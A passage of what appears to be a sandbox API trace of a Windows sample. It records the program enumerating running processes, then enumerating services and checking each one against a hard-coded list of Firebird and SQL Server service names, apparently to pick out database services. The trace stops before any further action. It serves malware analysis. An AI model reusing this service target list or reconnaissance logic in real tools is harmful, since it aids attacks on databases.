th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.357] lstrlenW (lpString="svchost.exe") returned 11 [0053.358] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x4fc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0053.358] lstrlenW (lpString="audiodg.exe") returned 11 [0053.358] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0053.359] lstrlenW (lpString="sihost.exe") returned 10 [0053.359] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x718, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.360] lstrlenW (lpString="svchost.exe") returned 11 [0053.360] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0053.360] lstrlenW (lpString="taskhostw.exe") returned 13 [0053.360] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0053.361] lstrlenW (lpString="OfficeClickToRun.exe") returned 20 [0053.361] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x55c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="SecurityHealthService.exe")) returned 1 [0053.362] lstrlenW (lpString="SecurityHealthService.exe") returned 25 [0053.362] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x834, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0053.362] lstrlenW (lpString="explorer.exe") returned 12 [0053.362] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x4, pcPriClassBase=8, dwFlags=0x0, szExeFile="Memory Compression")) returned 1 [0053.363] lstrlenW (lpString="Memory Compression") returned 18 [0053.363] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb50, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0053.364] lstrlenW (lpString="ShellExperienceHost.exe") returned 23 [0053.364] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1c, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0053.364] lstrlenW (lpString="SearchUI.exe") returned 12 [0053.364] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbf4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0053.365] lstrlenW (lpString="RuntimeBroker.exe") returned 17 [0053.365] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe04, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0053.366] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0053.366] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf24, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x3c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0053.366] lstrlenW (lpString="taskhostw.exe") returned 13 [0053.366] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UsoClient.exe")) returned 1 [0053.367] lstrlenW (lpString="UsoClient.exe") returned 13 [0053.367] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfb8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="OfficeC2RClient.exe")) returned 1 [0053.368] lstrlenW (lpString="OfficeC2RClient.exe") returned 19 [0053.368] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0053.368] lstrlenW (lpString="taskhostw.exe") returned 13 [0053.368] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="DeviceCensus.exe")) returned 1 [0053.369] lstrlenW (lpString="DeviceCensus.exe") returned 16 [0053.369] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfd0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="UNPCampaignManager.exe")) returned 1 [0053.370] lstrlenW (lpString="UNPCampaignManager.exe") returned 22 [0053.370] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0053.370] lstrlenW (lpString="msoia.exe") returned 9 [0053.370] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xfe8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="msoia.exe")) returned 1 [0053.371] lstrlenW (lpString="msoia.exe") returned 9 [0053.371] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xff4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x3c0, pcPriClassBase=6, dwFlags=0x0, szExeFile="AppHostRegistrationVerifier.exe")) returned 1 [0053.372] lstrlenW (lpString="AppHostRegistrationVerifier.exe") returned 31 [0053.372] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="screensaver.exe")) returned 1 [0053.373] lstrlenW (lpString="screensaver.exe") returned 15 [0053.373] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="xml upper.exe")) returned 1 [0053.373] lstrlenW (lpString="xml upper.exe") returned 13 [0053.373] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defeat preston.exe")) returned 1 [0053.374] lstrlenW (lpString="defeat preston.exe") returned 18 [0053.374] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="boss isolated.exe")) returned 1 [0053.375] lstrlenW (lpString="boss isolated.exe") returned 17 [0053.375] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="member.exe")) returned 1 [0053.375] lstrlenW (lpString="member.exe") returned 10 [0053.375] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="chubby-er.exe")) returned 1 [0053.376] lstrlenW (lpString="chubby-er.exe") returned 13 [0053.376] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x9e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="forgotten awareness anymore.exe")) returned 1 [0053.377] lstrlenW (lpString="forgotten awareness anymore.exe") returned 31 [0053.377] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="organization.exe")) returned 1 [0053.377] lstrlenW (lpString="organization.exe") returned 16 [0053.377] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xcf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="citizenship_surfaces_neil.exe")) returned 1 [0053.378] lstrlenW (lpString="citizenship_surfaces_neil.exe") returned 29 [0053.378] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xce4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="spray-roman.exe")) returned 1 [0053.379] lstrlenW (lpString="spray-roman.exe") returned 15 [0053.379] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x654, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="elementary-east-examined.exe")) returned 1 [0053.379] lstrlenW (lpString="elementary-east-examined.exe") returned 28 [0053.379] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x784, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="tank attacks.exe")) returned 1 [0053.380] lstrlenW (lpString="tank attacks.exe") returned 16 [0053.380] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="wires jacket.exe")) returned 1 [0053.381] lstrlenW (lpString="wires jacket.exe") returned 16 [0053.381] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd4c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="values.exe")) returned 1 [0053.382] lstrlenW (lpString="values.exe") returned 10 [0053.382] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd54, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebecca mid developer.exe")) returned 1 [0053.383] lstrlenW (lpString="rebecca mid developer.exe") returned 25 [0053.383] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="printersaerospace.exe")) returned 1 [0053.383] lstrlenW (lpString="printersaerospace.exe") returned 21 [0053.383] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xd74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="defects_burning_rank.exe")) returned 1 [0053.384] lstrlenW (lpString="defects_burning_rank.exe") returned 24 [0053.384] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xac4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x2b4, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0053.385] lstrlenW (lpString="dllhost.exe") returned 11 [0053.385] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="joke.exe")) returned 1 [0053.386] lstrlenW (lpString="joke.exe") returned 8 [0053.386] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="dim-hindu-customize.exe")) returned 1 [0053.387] lstrlenW (lpString="dim-hindu-customize.exe") returned 23 [0053.387] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xddc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="documents.exe")) returned 1 [0053.387] lstrlenW (lpString="documents.exe") returned 13 [0053.387] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xdc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="rebel.exe")) returned 1 [0053.390] lstrlenW (lpString="rebel.exe") returned 9 [0053.390] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb64, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="arbor-tutorials-lawyers.exe")) returned 1 [0053.390] lstrlenW (lpString="arbor-tutorials-lawyers.exe") returned 27 [0053.390] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfc8, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.391] lstrlenW (lpString="conhost.exe") returned 11 [0053.391] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xa88, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xfb0, pcPriClassBase=6, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.392] lstrlenW (lpString="conhost.exe") returned 11 [0053.392] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xe0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x860, pcPriClassBase=8, dwFlags=0x0, szExeFile="hgaibc.exe")) returned 1 [0053.393] lstrlenW (lpString="hgaibc.exe") returned 10 [0053.393] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf8c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xe0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1 [0053.394] lstrlenW (lpString="cmd.exe") returned 7 [0053.394] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xf48, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x12c, pcPriClassBase=4, dwFlags=0x0, szExeFile="CompatTelRunner.exe")) returned 1 [0053.395] lstrlenW (lpString="CompatTelRunner.exe") returned 19 [0053.395] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x384, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0xf8c, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.396] lstrlenW (lpString="conhost.exe") returned 11 [0053.396] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x658, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0xf48, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1 [0053.396] lstrlenW (lpString="conhost.exe") returned 11 [0053.396] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0053.397] lstrlenW (lpString="svchost.exe") returned 11 [0053.397] Process32NextW (in: hSnapshot=0x324, lppe=0x258fd2c | out: lppe=0x258fd2c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 0 [0053.398] CloseHandle (hObject=0x324) returned 1 [0053.398] Sleep (dwMilliseconds=0x1f4) [0053.904] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x60ea98 [0053.905] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 0 [0053.905] GetLastError () returned 0xea [0053.905] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x1ce8) returned 0x636198 [0053.905] EnumServicesStatusExW (in: hSCManager=0x60ea98, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x636198, cbBufSize=0x1ce8, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x636198, pcbBytesNeeded=0x258ff3c, lpServicesReturned=0x258ff54, lpResumeHandle=0x0) returned 1 [0053.906] CloseServiceHandle (hSCObject=0x60ea98) returned 1 [0053.906] lstrlenW (lpString="Appinfo") returned 7 [0053.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Appinfo") returned 1 [0053.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Appinfo") returned 1 [0053.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Appinfo") returned 1 [0053.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Appinfo") returned 1 [0053.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Appinfo") returned 1 [0053.906] lstrlenW (lpString="AppXSvc") returned 7 [0053.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AppXSvc") returned 1 [0053.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AppXSvc") returned 1 [0053.906] lstrcmpiW (lpString1="sqlwriter", lpString2="AppXSvc") returned 1 [0053.906] lstrcmpiW (lpString1="mssqlserver", lpString2="AppXSvc") returned 1 [0053.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AppXSvc") returned 1 [0053.906] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0053.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0053.906] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0053.906] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0053.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0053.906] lstrlenW (lpString="Audiosrv") returned 8 [0053.906] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Audiosrv") returned 1 [0053.906] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Audiosrv") returned 1 [0053.906] lstrcmpiW (lpString1="sqlwriter", lpString2="Audiosrv") returned 1 [0053.906] lstrcmpiW (lpString1="mssqlserver", lpString2="Audiosrv") returned 1 [0053.906] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Audiosrv") returned 1 [0053.907] lstrlenW (lpString="BFE") returned 3 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0053.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0053.907] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0053.907] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0053.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0053.907] lstrlenW (lpString="BITS") returned 4 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BITS") returned 1 [0053.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BITS") returned 1 [0053.907] lstrcmpiW (lpString1="sqlwriter", lpString2="BITS") returned 1 [0053.907] lstrcmpiW (lpString1="mssqlserver", lpString2="BITS") returned 1 [0053.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BITS") returned 1 [0053.907] lstrlenW (lpString="BrokerInfrastructure") returned 20 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0053.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BrokerInfrastructure") returned 1 [0053.907] lstrcmpiW (lpString1="sqlwriter", lpString2="BrokerInfrastructure") returned 1 [0053.907] lstrcmpiW (lpString1="mssqlserver", lpString2="BrokerInfrastructure") returned 1 [0053.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BrokerInfrastructure") returned 1 [0053.907] lstrlenW (lpString="CDPSvc") returned 6 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CDPSvc") returned 1 [0053.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CDPSvc") returned 1 [0053.907] lstrcmpiW (lpString1="sqlwriter", lpString2="CDPSvc") returned 1 [0053.907] lstrcmpiW (lpString1="mssqlserver", lpString2="CDPSvc") returned 1 [0053.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CDPSvc") returned 1 [0053.907] lstrlenW (lpString="ClickToRunSvc") returned 13 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0053.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ClickToRunSvc") returned 1 [0053.907] lstrcmpiW (lpString1="sqlwriter", lpString2="ClickToRunSvc") returned 1 [0053.907] lstrcmpiW (lpString1="mssqlserver", lpString2="ClickToRunSvc") returned 1 [0053.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ClickToRunSvc") returned 1 [0053.907] lstrlenW (lpString="CoreMessagingRegistrar") returned 22 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0053.907] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CoreMessagingRegistrar") returned 1 [0053.907] lstrcmpiW (lpString1="sqlwriter", lpString2="CoreMessagingRegistrar") returned 1 [0053.907] lstrcmpiW (lpString1="mssqlserver", lpString2="CoreMessagingRegistrar") returned 1 [0053.907] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CoreMessagingRegistrar") returned 1 [0053.907] lstrlenW (lpString="CryptSvc") returned 8 [0053.907] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0053.908] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0053.908] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0053.908] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0053.908] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0053.908] lstrlenW 